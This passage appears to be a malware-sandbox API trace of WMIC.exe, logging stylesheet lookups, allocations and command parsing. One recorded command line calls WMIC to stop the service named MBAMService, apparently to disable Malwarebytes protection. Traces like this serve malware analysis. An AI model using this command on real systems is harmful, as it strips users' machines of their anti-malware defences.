namedItem=0x2ecfc48 | out: namedItem=0x2ecfc48*=0x3689ff8) returned 0x0 [0306.797] free (_Block=0x322ab58) [0306.797] IXMLDOMNode:get_nodeValue (in: This=0x3689ff8, value=0x2ecfc08 | out: value=0x2ecfc08*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x0)) returned 0x0 [0306.797] malloc (_Size=0xc) returned 0x322ac60 [0306.797] malloc (_Size=0xc) returned 0x322ac18 [0306.797] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0306.797] SysStringLen (param_1="TABLE") returned 0x5 [0306.797] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0306.798] SysStringLen (param_1="XML") returned 0x3 [0306.798] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0306.798] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0306.798] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0306.798] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0306.798] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0306.798] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0306.798] malloc (_Size=0x18) returned 0x32229c0 [0306.798] IUnknown:Release (This=0x3686b88) returned 0x0 [0306.798] IUnknown:Release (This=0x3689fa8) returned 0x0 [0306.798] IUnknown:Release (This=0x3689ff8) returned 0x0 [0306.798] IXMLDOMNodeList:get_item (in: This=0x3689ca0, index=14, listItem=0x2ecfc50 | out: listItem=0x2ecfc50*=0x3686b88) returned 0x0 [0306.798] IXMLDOMNode:get_text (in: This=0x3686b88, text=0x2ecfc54 | out: text=0x2ecfc54*="texttable.xsl") returned 0x0 [0306.798] IXMLDOMNode:get_attributes (in: This=0x3686b88, attributeMap=0x2ecfc4c | out: attributeMap=0x2ecfc4c*=0x3689fa8) returned 0x0 [0306.798] malloc (_Size=0xc) returned 0x322ab58 [0306.798] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3689fa8, name="KEYWORD", namedItem=0x2ecfc48 | out: namedItem=0x2ecfc48*=0x3689ff8) returned 0x0 [0306.798] free (_Block=0x322ab58) [0306.798] IXMLDOMNode:get_nodeValue (in: This=0x3689ff8, value=0x2ecfc08 | out: value=0x2ecfc08*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x0)) returned 0x0 [0306.798] malloc (_Size=0xc) returned 0x322ac30 [0306.798] malloc (_Size=0xc) returned 0x322aca8 [0306.798] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0306.799] SysStringLen (param_1="TABLE") returned 0x5 [0306.799] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0306.799] SysStringLen (param_1="XML") returned 0x3 [0306.799] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0306.799] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0306.799] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0306.799] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0306.799] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0306.799] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0306.799] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0306.799] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0306.799] malloc (_Size=0x18) returned 0x3222c40 [0306.799] IUnknown:Release (This=0x3686b88) returned 0x0 [0306.799] IUnknown:Release (This=0x3689fa8) returned 0x0 [0306.799] IUnknown:Release (This=0x3689ff8) returned 0x0 [0306.799] IXMLDOMNodeList:get_item (in: This=0x3689ca0, index=15, listItem=0x2ecfc50 | out: listItem=0x2ecfc50*=0x3686b88) returned 0x0 [0306.799] IXMLDOMNode:get_text (in: This=0x3686b88, text=0x2ecfc54 | out: text=0x2ecfc54*="htable.xsl") returned 0x0 [0306.799] IXMLDOMNode:get_attributes (in: This=0x3686b88, attributeMap=0x2ecfc4c | out: attributeMap=0x2ecfc4c*=0x3689fa8) returned 0x0 [0306.799] malloc (_Size=0xc) returned 0x322ab10 [0306.799] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3689fa8, name="KEYWORD", namedItem=0x2ecfc48 | out: namedItem=0x2ecfc48*=0x3689ff8) returned 0x0 [0306.799] free (_Block=0x322ab10) [0306.799] IXMLDOMNode:get_nodeValue (in: This=0x3689ff8, value=0x2ecfc08 | out: value=0x2ecfc08*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby.xsl", varVal2=0x0)) returned 0x0 [0306.800] malloc (_Size=0xc) returned 0x322acc0 [0306.800] malloc (_Size=0xc) returned 0x322ade0 [0306.800] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0306.800] SysStringLen (param_1="TABLE") returned 0x5 [0306.800] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0306.800] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0306.800] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0306.800] SysStringLen (param_1="XML") returned 0x3 [0306.800] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0306.800] SysStringLen (param_1="texttablewsys") returned 0xd [0306.800] SysStringLen (param_1="XML") returned 0x3 [0306.800] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0306.800] malloc (_Size=0x18) returned 0x3222d60 [0306.800] IUnknown:Release (This=0x3686b88) returned 0x0 [0306.800] IUnknown:Release (This=0x3689fa8) returned 0x0 [0306.800] IUnknown:Release (This=0x3689ff8) returned 0x0 [0306.800] IXMLDOMNodeList:get_item (in: This=0x3689ca0, index=16, listItem=0x2ecfc50 | out: listItem=0x2ecfc50*=0x3686b88) returned 0x0 [0306.800] IXMLDOMNode:get_text (in: This=0x3686b88, text=0x2ecfc54 | out: text=0x2ecfc54*="htable.xsl") returned 0x0 [0306.800] IXMLDOMNode:get_attributes (in: This=0x3686b88, attributeMap=0x2ecfc4c | out: attributeMap=0x2ecfc4c*=0x3689fa8) returned 0x0 [0306.800] malloc (_Size=0xc) returned 0x322ac48 [0306.800] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3689fa8, name="KEYWORD", namedItem=0x2ecfc48 | out: namedItem=0x2ecfc48*=0x3689ff8) returned 0x0 [0306.800] free (_Block=0x322ac48) [0306.801] IXMLDOMNode:get_nodeValue (in: This=0x3689ff8, value=0x2ecfc08 | out: value=0x2ecfc08*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="htable-sortby", varVal2=0x0)) returned 0x0 [0306.801] malloc (_Size=0xc) returned 0x322ad38 [0306.801] malloc (_Size=0xc) returned 0x322aba0 [0306.801] SysStringLen (param_1="htable-sortby") returned 0xd [0306.801] SysStringLen (param_1="TABLE") returned 0x5 [0306.801] SysStringLen (param_1="htable-sortby") returned 0xd [0306.801] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0306.801] SysStringLen (param_1="htable-sortby") returned 0xd [0306.801] SysStringLen (param_1="XML") returned 0x3 [0306.801] SysStringLen (param_1="htable-sortby") returned 0xd [0306.801] SysStringLen (param_1="texttablewsys") returned 0xd [0306.801] SysStringLen (param_1="htable-sortby") returned 0xd [0306.801] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0306.801] SysStringLen (param_1="XML") returned 0x3 [0306.801] SysStringLen (param_1="htable-sortby") returned 0xd [0306.801] malloc (_Size=0x18) returned 0x32229a0 [0306.801] IUnknown:Release (This=0x3686b88) returned 0x0 [0306.801] IUnknown:Release (This=0x3689fa8) returned 0x0 [0306.801] IUnknown:Release (This=0x3689ff8) returned 0x0 [0306.801] IXMLDOMNodeList:get_item (in: This=0x3689ca0, index=17, listItem=0x2ecfc50 | out: listItem=0x2ecfc50*=0x3686b88) returned 0x0 [0306.801] IXMLDOMNode:get_text (in: This=0x3686b88, text=0x2ecfc54 | out: text=0x2ecfc54*="mof.xsl") returned 0x0 [0306.801] IXMLDOMNode:get_attributes (in: This=0x3686b88, attributeMap=0x2ecfc4c | out: attributeMap=0x2ecfc4c*=0x3689fa8) returned 0x0 [0306.801] malloc (_Size=0xc) returned 0x322abe8 [0306.801] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3689fa8, name="KEYWORD", namedItem=0x2ecfc48 | out: namedItem=0x2ecfc48*=0x3689ff8) returned 0x0 [0306.802] free (_Block=0x322abe8) [0306.802] IXMLDOMNode:get_nodeValue (in: This=0x3689ff8, value=0x2ecfc08 | out: value=0x2ecfc08*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat.xsl", varVal2=0x0)) returned 0x0 [0306.802] malloc (_Size=0xc) returned 0x322abd0 [0306.802] malloc (_Size=0xc) returned 0x322ad98 [0306.802] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0306.802] SysStringLen (param_1="TABLE") returned 0x5 [0306.802] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0306.802] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0306.802] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0306.802] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0306.802] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0306.802] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0306.802] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0306.802] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0306.802] malloc (_Size=0x18) returned 0x32229e0 [0306.802] IUnknown:Release (This=0x3686b88) returned 0x0 [0306.802] IUnknown:Release (This=0x3689fa8) returned 0x0 [0306.802] IUnknown:Release (This=0x3689ff8) returned 0x0 [0306.802] IXMLDOMNodeList:get_item (in: This=0x3689ca0, index=18, listItem=0x2ecfc50 | out: listItem=0x2ecfc50*=0x3686b88) returned 0x0 [0306.802] IXMLDOMNode:get_text (in: This=0x3686b88, text=0x2ecfc54 | out: text=0x2ecfc54*="mof.xsl") returned 0x0 [0306.802] IXMLDOMNode:get_attributes (in: This=0x3686b88, attributeMap=0x2ecfc4c | out: attributeMap=0x2ecfc4c*=0x3689fa8) returned 0x0 [0306.802] malloc (_Size=0xc) returned 0x322acd8 [0306.803] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3689fa8, name="KEYWORD", namedItem=0x2ecfc48 | out: namedItem=0x2ecfc48*=0x3689ff8) returned 0x0 [0306.803] free (_Block=0x322acd8) [0306.803] IXMLDOMNode:get_nodeValue (in: This=0x3689ff8, value=0x2ecfc08 | out: value=0x2ecfc08*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclimofformat", varVal2=0x0)) returned 0x0 [0306.803] malloc (_Size=0xc) returned 0x322acd8 [0306.803] malloc (_Size=0xc) returned 0x322abe8 [0306.803] SysStringLen (param_1="wmiclimofformat") returned 0xf [0306.803] SysStringLen (param_1="TABLE") returned 0x5 [0306.803] SysStringLen (param_1="wmiclimofformat") returned 0xf [0306.803] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0306.803] SysStringLen (param_1="wmiclimofformat") returned 0xf [0306.803] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0306.803] SysStringLen (param_1="wmiclimofformat") returned 0xf [0306.803] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0306.803] SysStringLen (param_1="wmiclimofformat") returned 0xf [0306.803] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0306.803] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0306.803] SysStringLen (param_1="wmiclimofformat") returned 0xf [0306.803] malloc (_Size=0x18) returned 0x3222a60 [0306.803] IUnknown:Release (This=0x3686b88) returned 0x0 [0306.803] IUnknown:Release (This=0x3689fa8) returned 0x0 [0306.803] IUnknown:Release (This=0x3689ff8) returned 0x0 [0306.803] IXMLDOMNodeList:get_item (in: This=0x3689ca0, index=19, listItem=0x2ecfc50 | out: listItem=0x2ecfc50*=0x3686b88) returned 0x0 [0306.804] IXMLDOMNode:get_text (in: This=0x3686b88, text=0x2ecfc54 | out: text=0x2ecfc54*="textvaluelist.xsl") returned 0x0 [0306.804] IXMLDOMNode:get_attributes (in: This=0x3686b88, attributeMap=0x2ecfc4c | out: attributeMap=0x2ecfc4c*=0x3689fa8) returned 0x0 [0306.804] malloc (_Size=0xc) returned 0x322ac48 [0306.804] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3689fa8, name="KEYWORD", namedItem=0x2ecfc48 | out: namedItem=0x2ecfc48*=0x3689ff8) returned 0x0 [0306.804] free (_Block=0x322ac48) [0306.804] IXMLDOMNode:get_nodeValue (in: This=0x3689ff8, value=0x2ecfc08 | out: value=0x2ecfc08*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat.xsl", varVal2=0x0)) returned 0x0 [0306.804] malloc (_Size=0xc) returned 0x322acf0 [0306.804] malloc (_Size=0xc) returned 0x322ad20 [0306.804] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0306.804] SysStringLen (param_1="TABLE") returned 0x5 [0306.804] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0306.804] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0306.804] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0306.804] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0306.804] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0306.804] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0306.804] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0306.804] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0306.804] malloc (_Size=0x18) returned 0x3222c80 [0306.804] IUnknown:Release (This=0x3686b88) returned 0x0 [0306.804] IUnknown:Release (This=0x3689fa8) returned 0x0 [0306.804] IUnknown:Release (This=0x3689ff8) returned 0x0 [0306.804] IXMLDOMNodeList:get_item (in: This=0x3689ca0, index=20, listItem=0x2ecfc50 | out: listItem=0x2ecfc50*=0x3686b88) returned 0x0 [0306.805] IXMLDOMNode:get_text (in: This=0x3686b88, text=0x2ecfc54 | out: text=0x2ecfc54*="textvaluelist.xsl") returned 0x0 [0306.805] IXMLDOMNode:get_attributes (in: This=0x3686b88, attributeMap=0x2ecfc4c | out: attributeMap=0x2ecfc4c*=0x3689fa8) returned 0x0 [0306.805] malloc (_Size=0xc) returned 0x322ad50 [0306.805] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3689fa8, name="KEYWORD", namedItem=0x2ecfc48 | out: namedItem=0x2ecfc48*=0x3689ff8) returned 0x0 [0306.805] free (_Block=0x322ad50) [0306.805] IXMLDOMNode:get_nodeValue (in: This=0x3689ff8, value=0x2ecfc08 | out: value=0x2ecfc08*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclivalueformat", varVal2=0x0)) returned 0x0 [0306.805] malloc (_Size=0xc) returned 0x322ac48 [0306.805] malloc (_Size=0xc) returned 0x322ab28 [0306.805] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0306.805] SysStringLen (param_1="TABLE") returned 0x5 [0306.805] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0306.805] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0306.805] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0306.805] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0306.805] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0306.805] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0306.805] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0306.805] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0306.805] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0306.805] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0306.805] malloc (_Size=0x18) returned 0x3222aa0 [0306.805] IUnknown:Release (This=0x3686b88) returned 0x0 [0306.806] IUnknown:Release (This=0x3689fa8) returned 0x0 [0306.806] IUnknown:Release (This=0x3689ff8) returned 0x0 [0306.806] IUnknown:Release (This=0x3689ca0) returned 0x0 [0306.806] FreeThreadedDOMDocument:IUnknown:Release (This=0x3686b48) returned 0x1 [0306.806] FreeThreadedDOMDocument:IUnknown:Release (This=0x36845a8) returned 0x0 [0306.806] free (_Block=0x3229808) [0306.806] GetCommandLineW () returned="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%MBAMService%%'\" call stopservice" [0306.806] malloc (_Size=0xe0) returned 0x322aee8 [0306.806] memcpy_s (in: _Destination=0x322aee8, _DestinationSize=0xde, _Source=0x2f01b78, _SourceSize=0xd6 | out: _Destination=0x322aee8) returned 0x0 [0306.806] malloc (_Size=0xc) returned 0x322ad50 [0306.806] malloc (_Size=0xc) returned 0x322ad68 [0306.806] malloc (_Size=0xc) returned 0x322ab10 [0306.806] malloc (_Size=0xc) returned 0x322ad80 [0306.806] malloc (_Size=0x80) returned 0x322afd0 [0306.806] GetLocalTime (in: lpSystemTime=0x2ecfbec | out: lpSystemTime=0x2ecfbec*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x2, wHour=0x8, wMinute=0x1d, wSecond=0xc, wMilliseconds=0x354)) [0306.806] _vsnwprintf (in: _Buffer=0x322afd0, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x2ecfbcc | out: _Buffer="04-02-2020T08:29:12") returned 19 [0306.806] lstrlenW (lpString=" path Win32_Service where \"name like '%%MBAMService%%'\" call stopservice") returned 72 [0306.806] malloc (_Size=0x92) returned 0x322b058 [0306.807] lstrlenW (lpString=" path Win32_Service where \"name like '%%MBAMService%%'\" call stopservice") returned 72 [0306.807] lstrlenW (lpString=" path Win32_Service where \"name like '%%MBAMService%%'\" call stopservice") returned 72 [0306.807] malloc (_Size=0x92) returned 0x322b0f8 [0306.807] lstrlenW (lpString=" path Win32_Service where \"name like '%%MBAMService%%'\" call stopservice") returned 72 [0306.807] lstrlenW (lpString=" path Win32_Service where \"name like '%%MBAMService%%'\" call stopservice") returned 72 [0306.807] lstrlenW (lpString=" path Win32_Service where \"name like '%%MBAMService%%'\" call stopservice") returned 72 [0306.807] malloc (_Size=0xa) returned 0x322adc8 [0306.807] lstrlenW (lpString="path") returned 4 [0306.807] _wcsicmp (_String1="path", _String2="\"NULL\"") returned 78 [0306.807] malloc (_Size=0xa) returned 0x322ab58 [0306.807] malloc (_Size=0x4) returned 0x3222ee8 [0306.807] free (_Block=0x0) [0306.807] free (_Block=0x322adc8) [0306.807] lstrlenW (lpString=" path Win32_Service where \"name like '%%MBAMService%%'\" call stopservice") returned 72 [0306.807] malloc (_Size=0x1c) returned 0x3229da8 [0306.807] lstrlenW (lpString="Win32_Service") returned 13 [0306.807] _wcsicmp (_String1="Win32_Service", _String2="\"NULL\"") returned 85 [0306.807] malloc (_Size=0x1c) returned 0x3220568 [0306.807] malloc (_Size=0x8) returned 0x3220590 [0306.807] memmove_s (in: _Destination=0x3220590, _DestinationSize=0x4, _Source=0x3222ee8, _SourceSize=0x4 | out: _Destination=0x3220590) returned 0x0 [0306.807] free (_Block=0x3222ee8) [0306.807] free (_Block=0x0) [0306.807] free (_Block=0x3229da8) [0306.807] lstrlenW (lpString=" path Win32_Service where \"name like '%%MBAMService%%'\" call stopservice") returned 72 [0306.807] malloc (_Size=0xc) returned 0x322adc8 [0306.807] lstrlenW (lpString="where") returned 5 [0306.807] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0306.807] malloc (_Size=0xc) returned 0x322adf8 [0306.807] malloc (_Size=0xc) returned 0x322ab70 [0306.807] memmove_s (in: _Destination=0x322ab70, _DestinationSize=0x8, _Source=0x3220590, _SourceSize=0x8 | out: _Destination=0x322ab70) returned 0x0 [0306.807] free (_Block=0x3220590) [0306.807] free (_Block=0x0) [0306.807] free (_Block=0x322adc8) [0306.807] lstrlenW (lpString=" path Win32_Service where \"name like '%%MBAMService%%'\" call stopservice") returned 72 [0306.808] malloc (_Size=0x3c) returned 0x322b198 [0306.808] lstrlenW (lpString="\"name like '%%MBAMService%%'\"") returned 29 [0306.808] _wcsicmp (_String1="\"name like '%%MBAMService%%'\"", _String2="\"NULL\"") returned -20 [0306.808] lstrlenW (lpString="\"name like '%%MBAMService%%'\"") returned 29 [0306.808] lstrlenW (lpString="\"name like '%%MBAMService%%'\"") returned 29 [0306.808] malloc (_Size=0x3c) returned 0x322b1e0 [0306.808] malloc (_Size=0x10) returned 0x322adc8 [0306.808] memmove_s (in: _Destination=0x322adc8, _DestinationSize=0xc, _Source=0x322ab70, _SourceSize=0xc | out: _Destination=0x322adc8) returned 0x0 [0306.808] free (_Block=0x322ab70) [0306.808] free (_Block=0x0) [0306.808] free (_Block=0x322b198) [0306.808] lstrlenW (lpString=" path Win32_Service where \"name like '%%MBAMService%%'\" call stopservice") returned 72 [0306.808] malloc (_Size=0xa) returned 0x322ab70 [0306.808] lstrlenW (lpString="call") returned 4 [0306.808] _wcsicmp (_String1="call", _String2="\"NULL\"") returned 65 [0306.808] malloc (_Size=0xa) returned 0x322ab88 [0306.808] malloc (_Size=0x18) returned 0x3222b00 [0306.808] memmove_s (in: _Destination=0x3222b00, _DestinationSize=0x10, _Source=0x322adc8, _SourceSize=0x10 | out: _Destination=0x3222b00) returned 0x0 [0306.808] free (_Block=0x322adc8) [0306.808] free (_Block=0x0) [0306.808] free (_Block=0x322ab70) [0306.808] lstrlenW (lpString=" path Win32_Service where \"name like '%%MBAMService%%'\" call stopservice") returned 72 [0306.808] malloc (_Size=0x18) returned 0x3222b20 [0306.808] lstrlenW (lpString="stopservice") returned 11 [0306.808] _wcsicmp (_String1="stopservice", _String2="\"NULL\"") returned 81 [0306.808] malloc (_Size=0x18) returned 0x3222b60 [0306.808] free (_Block=0x0) [0306.808] free (_Block=0x3222b20) [0306.808] malloc (_Size=0x18) returned 0x3222b20 [0306.808] lstrlenW (lpString="QUIT") returned 4 [0306.808] lstrlenW (lpString="path") returned 4 [0306.808] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="QUIT", cchCount2=4) returned 1 [0306.808] lstrlenW (lpString="EXIT") returned 4 [0306.808] lstrlenW (lpString="path") returned 4 [0306.808] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="EXIT", cchCount2=4) returned 3 [0306.809] free (_Block=0x3222b20) [0306.809] WbemLocator:IUnknown:AddRef (This=0x2f14ba8) returned 0x2 [0306.809] malloc (_Size=0x18) returned 0x3222b20 [0306.809] lstrlenW (lpString="/") returned 1 [0306.809] lstrlenW (lpString="path") returned 4 [0306.809] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0306.809] lstrlenW (lpString="-") returned 1 [0306.809] lstrlenW (lpString="path") returned 4 [0306.809] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0306.809] lstrlenW (lpString="CLASS") returned 5 [0306.809] lstrlenW (lpString="path") returned 4 [0306.809] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="CLASS", cchCount2=5) returned 3 [0306.809] lstrlenW (lpString="PATH") returned 4 [0306.809] lstrlenW (lpString="path") returned 4 [0306.809] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="PATH", cchCount2=4) returned 2 [0306.809] lstrlenW (lpString="/") returned 1 [0306.809] lstrlenW (lpString="Win32_Service") returned 13 [0306.809] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="/", cchCount2=1) returned 3 [0306.809] lstrlenW (lpString="-") returned 1 [0306.809] lstrlenW (lpString="Win32_Service") returned 13 [0306.809] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="-", cchCount2=1) returned 3 [0306.809] lstrlenW (lpString="Win32_Service") returned 13 [0306.809] malloc (_Size=0x1c) returned 0x3229da8 [0306.809] lstrlenW (lpString="Win32_Service") returned 13 [0306.810] wcstok (in: _String="Win32_Service", _Delimiter=".", _Context=0xd40bfbef | out: _String="Win32_Service", _Context=0xd40bfbef) returned="Win32_Service" [0306.810] lstrlenW (lpString="Win32_Service") returned 13 [0306.810] malloc (_Size=0x1c) returned 0x322b198 [0306.810] lstrlenW (lpString="Win32_Service") returned 13 [0306.810] wcstok (in: _String=0x0, _Delimiter=",", _Context=0xd40bfbef | out: _String=0x0, _Context=0xd40bfbef) returned 0x0 [0306.810] lstrlenW (lpString="") returned 0 [0306.810] lstrlenW (lpString="WHERE") returned 5 [0306.810] lstrlenW (lpString="where") returned 5 [0306.810] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0306.810] lstrlenW (lpString="/") returned 1 [0306.810] lstrlenW (lpString="name like '%%MBAMService%%'") returned 27 [0306.810] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%MBAMService%%'", cchCount1=27, lpString2="/", cchCount2=1) returned 3 [0306.810] lstrlenW (lpString="-") returned 1 [0306.810] lstrlenW (lpString="name like '%%MBAMService%%'") returned 27 [0306.810] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%MBAMService%%'", cchCount1=27, lpString2="-", cchCount2=1) returned 3 [0306.810] lstrlenW (lpString="name like '%%MBAMService%%'") returned 27 [0306.810] malloc (_Size=0x38) returned 0x322b228 [0306.810] lstrlenW (lpString="name like '%%MBAMService%%'") returned 27 [0306.810] lstrlenW (lpString="/") returned 1 [0306.810] lstrlenW (lpString="call") returned 4 [0306.810] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0306.810] lstrlenW (lpString="-") returned 1 [0306.810] lstrlenW (lpString="call") returned 4 [0306.810] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0306.810] lstrlenW (lpString="call") returned 4 [0306.810] malloc (_Size=0xa) returned 0x322adc8 [0306.810] lstrlenW (lpString="call") returned 4 [0306.810] lstrlenW (lpString="GET") returned 3 [0306.810] lstrlenW (lpString="call") returned 4 [0306.810] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0306.810] lstrlenW (lpString="LIST") returned 4 [0306.811] lstrlenW (lpString="call") returned 4 [0306.811] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0306.811] lstrlenW (lpString="SET") returned 3 [0306.811] lstrlenW (lpString="call") returned 4 [0306.811] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0306.811] lstrlenW (lpString="CREATE") returned 6 [0306.811] lstrlenW (lpString="call") returned 4 [0306.811] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0306.811] lstrlenW (lpString="CALL") returned 4 [0306.811] lstrlenW (lpString="call") returned 4 [0306.811] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0306.811] lstrlenW (lpString="/") returned 1 [0306.811] lstrlenW (lpString="stopservice") returned 11 [0306.811] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="/", cchCount2=1) returned 3 [0306.811] lstrlenW (lpString="-") returned 1 [0306.811] lstrlenW (lpString="stopservice") returned 11 [0306.811] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="-", cchCount2=1) returned 3 [0306.811] lstrlenW (lpString="stopservice") returned 11 [0306.811] malloc (_Size=0x18) returned 0x3222ba0 [0306.811] lstrlenW (lpString="stopservice") returned 11 [0306.811] ??0CHString@@QAE@XZ () returned 0x2ecdab4 [0306.811] GetCurrentThreadId () returned 0x3e0 [0306.812] GetCurrentThreadId () returned 0x3e0 [0306.812] ??0CHString@@QAE@XZ () returned 0x2ecda3c [0306.812] malloc (_Size=0x4) returned 0x3222ee8 [0306.812] malloc (_Size=0xc) returned 0x322ab70 [0306.812] malloc (_Size=0xc) returned 0x322ae28 [0306.812] WbemLocator:IWbemLocator:ConnectServer (in: This=0x2f14ba8, strNetworkResource="root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xa68518 | out: ppNamespace=0xa68518*=0x2f1a8d8) returned 0x0 [0306.856] free (_Block=0x322ae28) [0306.856] CoSetProxyBlanket (pProxy=0x2f1a8d8, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0306.856] free (_Block=0x3222ee8) [0306.856] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0306.856] free 